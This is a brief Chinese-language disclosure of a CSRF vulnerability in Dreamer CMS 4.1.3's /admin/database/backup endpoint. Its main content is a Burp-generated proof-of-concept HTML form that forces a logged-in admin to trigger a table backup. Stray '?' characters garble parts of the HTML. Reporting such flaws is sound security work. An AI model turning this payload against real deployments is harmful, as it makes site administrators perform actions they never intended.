梦想家内容管理系统（Dreamer CMS）跨站请求伪造漏洞

梦想家内容管理系统（Dreamer CMS）跨站请求伪造漏洞

目标:GitHub - iteachyou-wjn/dreamer_cms: Dreamer CMS 梦想家内容发布系统采用流行的SpringBoot搭建，支持静态化、标签化建站。不需要专业的后台开发技能，会HTML就能建站，上手超简单；只需使用系统提供的标签就能轻松建设网站。全面支持各类表单字段，真正实现“0”代码建网站。

版本：4.1.3

通过组件/admin/database/backup发现包含跨站点请求伪造（CSRF）

创建poc

<html> ?<!-- CSRF PoC - generated by Burp Suite Professional --> ?<body> ?<script>history.pushState('', '', '/')</script> ? ?<form action="http://192.168.247.186:8888/admin/database/backup"> ? ? ?<input type="hidden" name="tableName" value="system&#95;adverts" /> ? ? ?<input type="submit" value="Submit request" /> ? ?</form> ?</body> </html>

成功

本文链接：? https://www.黑客.wang/wen/22.html